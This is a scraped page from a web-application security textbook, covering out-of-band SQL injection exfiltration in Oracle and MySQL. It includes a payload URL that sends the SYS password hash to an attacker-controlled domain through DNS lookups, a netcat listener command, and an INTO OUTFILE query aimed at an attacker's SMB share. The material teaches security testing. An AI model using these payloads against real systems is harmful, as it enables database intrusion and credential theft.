The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

Download 5,76 Mb.

Pdf ko'rish

bet	492/875
Sana	01.01.2022
Hajmi	5,76 Mb.
	#293004

1 ... 488 489 490 491 492 493 494 495 ... 875

Bog'liq
3794 1008 4334

Chapter 9

■

Injecting Code

275

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 275

This URL causes

UTL_HTTP

to make a

GET

request for a URL containing the

first username in the table

all_users

. The attacker can simply set up a netcat

listener on

wahh-attacker.com

to receive the result:

C:\>nc -nLp 80

GET /SYS HTTP/1.1

Host: wahh-attacker.com

Connection: close

The

UTL_INADDR

package is designed to be used to resolve host names to IP

addresses. It can be used to generate arbitrary DNS queries to a server con-

trolled by the attacker. In many situations, this is more likely to succeed than

the

UTL_HTTP

attack because DNS traffic is often allowed out through corpo-

rate firewalls even when HTTP traffic is restricted. The attacker can leverage

this package to perform a lookup on a hostname of their choice, effectively

retrieving arbitrary data by prepending it as a subdomain to a domain name

that they control, for example:

https://wahh-app.com/employees.asp?EmpNo=7521’||UTL_INADDR.GET_HOST_

NAME((SELECT%20PASSWORD%20FROM%20DBA_USERS%20WHERE%20USERNAME=’SYS’)||’.

wahh-attacker.com’)

This results in a DNS query to the

wahh-attacker.com

name server contain-

ing the

SYS

user’s password hash:

DCB748A5BC5390F2.wahh-attacker.com

The

UTL_SMTP

package can be used to send emails. This facility can be used

to retrieve large volumes of data captured from the database by sending this in

outbound emails.

The

UTL_TCP

package can be used to open arbitrary TCP sockets to send and

receive network data.

MySQL

The

SELECT ... INTO OUTFILE

command can be used to direct the output from

an arbitrary query into a file. The specified filename may contain a UNC path,

enabling you to direct the output to a file on your own computer. For example:

select * into outfile ‘\\\\attacker\\share\\output.txt’ from users;

To receive the file, you will need to create an SMB share on your computer

that allows anonymous write access. You can configure shares on both Win-

dows and Unix-based platforms to behave in this way. If you have difficulty

receiving the exported file, this may well result from a configuration issue in

your SMB server. You can use a sniffer to confirm whether the target server is

Download 5,76 Mb.

Do'stlaringiz bilan baham:

1 ... 488 489 490 491 492 493 494 495 ... 875